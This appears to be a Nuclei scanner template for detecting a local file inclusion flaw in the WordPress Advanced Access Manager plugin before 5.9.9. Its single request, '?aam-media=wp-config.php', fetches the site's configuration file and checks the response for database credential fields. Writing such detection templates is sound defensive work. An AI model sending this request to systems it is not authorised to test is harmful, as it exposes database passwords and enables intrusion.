id: advanced-access-manager-lfi info: name: WordPress Advanced Access Manager < 5.9.9 - Local File Inclusion author: 0x_Akoko severity: high description: | WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers. reference: - https://wpscan.com/vulnerability/9873 - https://id.wordpress.org/plugins/advanced-access-manager/ - https://wpscan.com/vulnerability/dfe62ff5-956c-4403-b3fd-55677628036b classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 tags: wordpress,wp-plugin,lfi,wp,accessmanager,wpscan http: - method: GET path: - '{{BaseURL}}/?aam-media=wp-config.php' matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and - type: status status: - 200 # digest: 4a0a0047304502200acf6fcdd8c6464216c0297dfdec39c182a79e0f3f4afb631e59a0a1730a428f022100d6c8060f1cdf193bfa049cfb3a3bfd68ddb89f1988451a38da775e15697c2d9b:922c64590222798bb761d5b6d8e72950